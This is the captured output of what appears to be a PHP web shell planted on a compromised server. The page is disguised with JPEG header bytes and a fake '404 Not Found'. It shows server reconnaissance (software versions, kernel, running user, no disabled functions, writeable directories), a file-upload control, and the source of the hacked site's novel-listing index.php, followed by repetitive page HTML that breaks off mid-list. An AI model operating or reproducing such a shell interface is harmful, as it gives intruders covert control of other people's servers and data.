ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/lnovel/code/home/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/lnovel/code/home/index.php
<?php
$where = " AND truyen_active_status='Active' AND truyen_sochuong is not NULL ";
$order_by = ' time_update DESC ';
$pageNum = isset($_GET['pageNum']) ? intval($_GET['pageNum']) : 1;
$pageSize = 36;
$from = (($pageNum * $pageSize) - $pageSize);
$key_total_news = md5("SELECT count(*) as total FROM tb_truyen WHERE 1 ".$where);
$cache_total_news = $memcache->get($key_total_news);
if($cache_total_news){
    $total = $cache_total_news;
}else {
    $t = $DB->fetch_row($DB->query("SELECT count(*) as total FROM tb_truyen WHERE 1 " . $where));
    $total = $t['total'];
    $memcache->set($key_total_news, $total, MEMCACHE_COMPRESSED, 600);
}
$totalPage = ceil($total / $pageSize);
$key_list_new = md5("SELECT * FROM tb_truyen WHERE 4 ".$where." ORDER BY ".$order_by." LIMIT $from, $pageSize"); // Unique Words
$cache_result_list_phim = $memcache->get($key_list_new); // Memcached object
if($cache_result_list_phim){
    $list = $cache_result_list_phim;
}else {
    $query = $DB->query("SELECT * FROM tb_truyen WHERE 1 " . $where . " ORDER BY " . $order_by . " LIMIT $from, $pageSize");
    $list = '';
    while ($row = $DB->fetch_row($query)) {
        $truyen_othername = ($row['truyen_othername'] != '') ? $row['truyen_othername'] : 'Updating';
        $list_chap = '';
        $txt_new = date('F j, Y', strtotime($row['truyen_chuong_moinhat_time']));
        if ((time() - strtotime($row['truyen_chuong_moinhat_time'])) < 86400) {
            $txt_new = '<span class="text-danger">New</span>';
        }
        $txt_new2 = date('F j, Y', strtotime($row['truyen_chuong_moinhi_time']));
        if ((time() - strtotime($row['truyen_chuong_moinhi_time'])) < 86400) {
            $txt_new2 = '<span class="text-danger">New</span>';
        }
        if(!empty($row['truyen_chuong_moinhat_lock']) and strtotime($row['truyen_chuong_moinhat_lock'])>time()){
            $txt_new = '<span class="text-warning"><i class="fas fa-crown"></i></span>';
        }
        if(!empty($row['truyen_chuong_moinhi_lock']) and strtotime($row['truyen_chuong_moinhi_lock'])>time()){
            $txt_new2 = '<span class="text-warning"><i class="fas fa-crown"></i></span>';
        }
        $list_chap .= '<li class="list-group-item-custom list-group-item"><a href="/' . $row['truyen_fname'] . '-' . $row['truyen_id'] . '/' . $row['truyen_chuong_moinhat_fname'] . '-' . $row['truyen_chuong_moinhat_id'] . '/" class="text-secondary list-2-chap" title="' . $row['truyen_chuong_moinhat_name'] . '">' . $row['truyen_chuong_moinhat_name'] . '</a> <span class="blockquote-footer"><cite title="' . $row['truyen_chuong_moinhat_name'] . '">' . $txt_new . '</cite></span></li>';
        $list_chap .= '<li class="list-group-item-custom list-group-item"><a href="/' . $row['truyen_fname'] . '-' . $row['truyen_id'] . '/' . $row['truyen_chuong_moinhi_fname'] . '-' . $row['truyen_chuong_moinhi_id'] . '/" class="text-secondary list-2-chap" title="' . $row['truyen_chuong_moinhi_name'] . '">' . $row['truyen_chuong_moinhi_name'] . '</a> <span class="blockquote-footer"><cite title="' . $row['truyen_chuong_moinhi_name'] . '">' . $txt_new2 . '</cite></span></li>';
        $txt_update = date('F j, Y', strtotime($row['truyen_chuong_moinhat_time']));
        $title_tooltip = '<div class="box_tootip" style="display:none;" id="manga-tooltip-' . $row['truyen_id'] . '">
<div class="box_li">
<div class="title">' . $row['truyen_name'] . '</div>
<div class="clearfix">
<div class="box_img">
<a title="' . $row['truyen_name'] . '" href="/' . $row['truyen_fname'] . '-' . $row['truyen_id'] . '/">
<img class="img_a" src="' . $row['truyen_thumb'] . '" alt="' . $row['truyen_name'] . '">
</a>
</div>
<div class="message_main">
<p><label>Alternative:</label>' . $truyen_othername . '</p>
<p><label>Genres:</label>' . $row['truyen_theloai'] . '</p>
<p><label>Status:</label>' . $row['truyen_status'] . '</p>
<p><label>View:</label>' . shortNumber(intval($row['truyen_hit'])) . '</p>
<p><label>Comment:</label>' . shortNumber(intval($row['truyen_hitcomment'])) . '</p>
<p><label>Follow:</label>' . shortNumber(intval($row['truyen_theodoi'])) . '</p>
<p><label>Updated:</label>' . $txt_update . '</p>
</div>
</div>
<div class="box_text">' . strip_tags(html_entity_decode($row['truyen_noidung'])) . '</div>
</div>
</div>';
        $list .= '<div class="col-lg-3 col-md-4 col-sm-4 col-6 video position-relative mb-2">
                            <div class="card">
                                <div class="view home clearfix">
<span class="pull-left">
<i class="far fa-eye">
</i> ' . shortNumber($row['truyen_hit']) . ' <i class="far fa-comment"></i> ' . shortNumber($row['truyen_hitcomment']) . ' <i class="far fa-heart"></i> ' . shortNumber($row['truyen_theodoi']) . ' </span>
                                </div>
                                <a href="/' . $row['truyen_fname'] . '-' . $row['truyen_id'] . '/"><img src="' . $row['truyen_thumb'] . '" class="jtip card-img-top" alt="' . $row['truyen_name'] . '" data-jtip="#manga-tooltip-' . $row['truyen_id'] . '"></a>
                                <div class="card-body list-left-8-manga">
                                    <p class="card-text title-manga"><a href="/' . $row['truyen_fname'] . '-' . $row['truyen_id'] . '/" class="jtip text-body" data-jtip="#manga-tooltip-' . $row['truyen_id'] . '">' . $row['truyen_name'] . '</a></p>
                                </div>
                                <ul class="list-group list-group-flush" style="font-size: 12px;">
                                ' . $list_chap . '
                                </ul>
                            </div>
                        </div>';
        $list .= $title_tooltip;
    }
    $memcache->set($key_list_new, $list, MEMCACHE_COMPRESSED, 600);
}
$nav = $print->Pagination($totalPage,$pageNum,'pages','?act=home');
?>
<?php
$CORE->title_page = 'Home';
include 'layout/'.$INFO['path_skin'].'/header.php';
include 'layout/'.$INFO['path_skin'].'/menu.php';
?>
<main id="main-container">

    <div class="container">

        <div class="items-slide">
            <div class="owl-carousel">
                <?php echo recommendation(50);?>
            </div>
        </div>
        <section class="flexbox">
            <div class="flex-70 flex-m-100">
                <header class="box-header"><h3>LATEST NOVEL RELEASES</h3>
                    <a href="/" class="header-elements"><i class="far fa-filter"></i></a>
                </header>
                <div class="story-grid tab-content current">
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>

                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>

                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>

                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>

                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>

                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/06/the-daily-life-of-a-female-esper-in-ancient-times-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/05/cultivation-when-you-take-things-to-the-extreme-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>
                    <div class="small-story_item">
                        <a href="/Manipulative Harem God" class="cover" title="Manipulative Harem God">
                            <img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg" alt="Manipulative Harem God" width="220" height="283" src="https://1stkissnovel.org/wp-content/uploads/2024/01/the-supreme-martial-king-shocking-all-realms-175x238.jpg">
                        </a>
                        <h3 class="story-title" itemprop="name"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                        <span class="author"><a href="/Manipulative Harem God" itemprop="url" title="Manipulative Harem God">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></span>
                    </div>

                </div>
                <nav aria-label="Page navigation">
                    <ul class="pagination justify-content-center">
                        <li class="page-item active"><a class="page-link">1</a></li>   <li class="page-item"><a href="?act=home&amp;pageNum=2#pages" class="page-link">2</a></li>   <li class="page-item"><a href="?act=home&amp;pageNum=3#pages" class="page-link">3</a></li>   <li class="page-item"><a href="?act=home&amp;pageNum=2#pages" class="page-link">»</a></li>  <li class="page-item"><a href="?act=home&amp;pageNum=742#pages" class="page-link">Last</a></li>                             </ul>
                </nav>
            </div>
            <div class="flex-30 flex-m-100">
                <header class="box-header"><h3>Follow</h3> <a href="/" class="header-elements"><i class="fal fa-border-all"></i></a></header>
                <ul class="story_list_thumb_container" data-template="story_list_thumb" data-data="new_author_stories" data-rows="10">
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author">June 25, 2024</span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author">June 25, 2024</span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author">June 25, 2024</span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author">June 25, 2024</span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author">June 25, 2024</span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>

                </ul>

                <header class="box-header"><h3>History</h3> <a href="/" class="header-elements"><i class="fal fa-border-all"></i></a></header>
                <ul class="story_list_thumb_container" data-template="story_list_thumb" data-data="new_author_stories" data-rows="10">
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author"><a href="" class="text-danger"><i class="fas fa-trash-alt"></i> Delete</a></span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author"><a href="" class="text-danger"><i class="fas fa-trash-alt"></i> Delete</a></span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author"><a href="" class="text-danger"><i class="fas fa-trash-alt"></i> Delete</a></span>
